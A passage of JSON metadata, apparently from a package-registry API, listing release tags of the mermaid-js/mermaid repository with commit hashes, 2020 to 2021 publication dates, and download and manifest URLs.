s"},{"name":"8.13.8","sha":"65592e0541790968703f16bc0b91a641b5443111","kind":"commit","published_at":"2021-12-28T16:31:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8/manifests"},{"name":"8.13.7","sha":"52af0476c14be9f98d669e336a5625f5fb609aee","kind":"commit","published_at":"2021-12-22T20:20:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7/manifests"},{"name":"8.13.6","sha":"a44714c715e49ff2dc86a401962dc5929b6eca06","kind":"commit","published_at":"2021-12-16T19:06:50.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6/manifests"},{"name":"real-8.13.5","sha":"7da80812e0510ae04f9ebf3a151a048ef9ce6834","kind":"commit","published_at":"2021-12-08T06:53:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/real-8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/real-8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@real-8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5/manifests"},{"name":"8.13.5","sha":"2ce18ec2a8c6f6c2ece20f749628443ac663119f","kind":"commit","published_at":"2021-12-07T22:09:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5/manifests"},{"name":"8.13.4","sha":"650bcef3d1f940aec0cf4b81d1433b74b5e0f55c","kind":"commit","published_at":"2021-11-18T16:11:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4/manifests"},{"name":"8.13.3","sha":"0d7d5ddc5fbd8482dd7e907d3eef41cd1240f68f","kind":"commit","published_at":"2021-10-14T19:19:28.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3/manifests"},{"name":"8.13.2","sha":"2758d6477803dd9e5e8975b0d93b33c69be7b377","kind":"commit","published_at":"2021-09-29T18:22:45.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2/manifests"},{"name":"8.13.1","sha":"029042393c795b4b3ef9c91ae66564610e4b0c89","kind":"commit","published_at":"2021-09-29T18:05:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1/manifests"},{"name":"8.13.0","sha":"75b79e1b23f288e4706f21f62925c17c676cf4c0","kind":"commit","published_at":"2021-09-29T06:45:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0/manifests"},{"name":"8.12.1","sha":"48b6a32fe19af7e600fb0df900aa5956159e52d7","kind":"commit","published_at":"2021-08-26T17:43:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1/manifests"},{"name":"8.12.0","sha":"296a64f465021a8424cd72d495a24f4cc3c59c1e","kind":"commit","published_at":"2021-08-26T17:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0/manifests"},{"name":"8.11.5","sha":"962998810bccd537365f7de45891ebba48487cde","kind":"commit","published_at":"2021-08-15T15:41:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5/manifests"},{"name":"8.11.4","sha":"a670b678445f2894844ecbe7352f994396caa518","kind":"commit","published_at":"2021-08-05T17:58:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4/manifests"},{"name":"8.11.3","sha":"af7f5d0aaf3ede2f2efca6f24ec527c4e7065e2f","kind":"commit","published_at":"2021-08-04T17:25:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3/manifests"},{"name":"8.11.2","sha":"9245b0bb8b82c200c7c7a277cd619db6e5dd7715","kind":"commit","published_at":"2021-07-29T17:34:51.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2/manifests"},{"name":"8.11.1","sha":"33e8ee6c0e8bfd03f5d3fee51237a156c2e5a537","kind":"commit","published_at":"2021-07-28T13:54:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1/manifests"},{"name":"untagged-78173a5e15ffdf8f1e6a","sha":"52b1b23d4753a3d068e19052e5f4d25e88057517","kind":"commit","published_at":"2021-07-15T12:54:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-78173a5e15ffdf8f1e6a","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-78173a5e15ffdf8f1e6a","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-78173a5e15ffdf8f1e6a","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a/manifests"},{"name":"8.11.0-rc2","sha":"1d782678715699e8485480bff309adc2b648c7c1","kind":"commit","published_at":"2021-06-27T05:57:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0-rc2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2/manifests"},{"name":"8.11.0","sha":"eef4ef54a177c96b0efcf1c8c98f8d4d9f454e00","kind":"commit","published_at":"2021-06-25T10:27:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0/manifests"},{"name":"untagged-f83ec2a9deaf6677e0c7","sha":"e6e94ad57ea06ef8627bf91ddfbd88f5082952bf","kind":"commit","published_at":"2021-06-05T10:11:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f83ec2a9deaf6677e0c7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f83ec2a9deaf6677e0c7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f83ec2a9deaf6677e0c7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7/manifests"},{"name":"8.10.1","sha":"417428aceada045eabcc92826c68e08a1329c98f","kind":"commit","published_at":"2021-05-10T16:14:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1/manifests"},{"name":"8.9.3","sha":"8b3ac57ce7e6ae6ea4a66a9d8a28d8fcde936bb9","kind":"commit","published_at":"2021-04-25T11:24:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3/manifests"},{"name":"untagged-502e9410f3e7fd2ed484","sha":"45918da48ec99a706aa2b39598ae32cdccf95004","kind":"commit","published_at":"2021-04-25T10:27:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-502e9410f3e7fd2ed484","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-502e9410f3e7fd2ed484","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-502e9410f3e7fd2ed484","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484/manifests"},{"name":"8.9.2","sha":"a5cc75c1f7b722ebd0c2f848b25e2350655841dd","kind":"commit","published_at":"2021-03-18T20:02:49.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2/manifests"},{"name":"8.9.1","sha":"be95b93a2d91d62bc8618b906356514232b4343d","kind":"commit","published_at":"2021-02-18T20:41:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1/manifests"},{"name":"8.9.0","sha":"3c5da00230a586843364ff55f909fe27be2c0b41","kind":"tag","published_at":"2021-01-21T18:49:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0/manifests"},{"name":"v8.8.4","sha":"d6b2bcf0d23af89f65de659d2d7edd32a41ccddc","kind":"tag","published_at":"2020-12-05T13:43:29.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v8.8.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v8.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v8.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4/manifests"},{"name":"8.8.3","sha":"e3cf8b78437bb542029e91a022c81fbd4d361e6a","kind":"commit","published_at":"2020-11-05T19:09:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3/manifests"},{"name":"8.8.2","sha":"0f9da18cbe9bea6021ab78553902e5a1a517d61a","kind":"commit","published_at":"2020-10-08T17:48:33.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2/manifests"},{"name":"8.8.1","sha":"4dc805d25add19ae07ac9fe8951b4036332e0530","kind":"commit","published_at":"2020-09-30T17:23:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1/manifests"},{"name":"8.8.0","sha":"0918b97e815ad77e8b8e88ebb52400937f197885","kind":"commit","published_at":"2020-09-05T07:46:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0/manifests"},{"name":"8.7.0","sha":"4c38b1a776d83a00e12dd820b1bee455c3954e3c","kind":"commit","published_at":"2020-08-09T12:03:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0/manifests"},{"name":"8.6.4","sha":"95b7e4f9adc560dfd2ec6cc2b1f43397b2641012","kind":"commit","published_at":"2020-07-26T12:09:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4/manifests"},{"name":"8.6.3","sha":"d12b197ec951fa74574b4ef9fb95a55881cdd7a9","kind":"commit","published_at":"2020-07-24T06:28:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3/manifests"},{"name":"8.6.2","sha":"f68536357415d16b239e04a98e6195227399557e","kind":"commit","published_at":"2020-07-22T17:22:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2/manifests"},{"name":"8.6.0","sha":"b4203992bf98c209a578b1139c44d107b708ca6c","kind":"commit","published_at":"2020-07-13T14:42:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0/manifests"},{"name":"8.5.2","sha":"e9e5c75decbd5f5bdcf6c9d63c8f8f553263f6e2","kind":"commit","published_at":"2020-06-07T08:39:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2/manifests"},{"name":"8.5.1","sha":"9470a4f1edc0d0d5b8398e2c41029895fa5f738a","kind":"tag","published_at":"2020-05-17T08:12:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1/manifests"},{"name":"untagged-566ebfbf21141b604025","sha":"0ac48a431a319b2ff7aaaef889ddd53f153acc6d","kind":"commit","published_at":"2020-05-13T17:32:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-566ebfbf21141b604025","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-566ebfbf21141b604025","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-566ebfbf21141b604025","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025/manifests"},{"name":"untagged-31c93788afe260d914bb","sha":"5bdffd7d20c5622540c691ba63f635b8eedabf40","kind":"commit","published_at":"2020-04-11T16:10:53.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-31c93788afe260d914bb","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-31c93788afe260d914bb","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-31c93788afe260d914bb","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb/manifests"},{"name":"8.4.8","sha":"1c07e550bb5fee590f69a1f7892e481a2cf53cff","kind":"commit","published_at":"2020-02-21T09:23:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8/manifests"},{"name":"untagged-7651dabb407ecd5631ce","sha":"98229a47b298f4124d88347edbd56357866df7ee","kind":"commit","published_at":"2020-02-16T11:46:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-7651dabb407ecd5631ce","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-7651dabb407ecd5631ce","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-7651dabb407ecd5631ce","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce/manifests"},{"name":"8.4.6","sha":"4805394e612c836bf27710794ce6f9aa86b7ac60","kind":"tag","published_at":"2020-01-22T18:53:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6/manifests"},{"name":"untagged-f43366252632a1a42020","sha":"e0d16dcb22333f967e172e1f5b78af4baf6c0eff","kind":"commit","published_at":"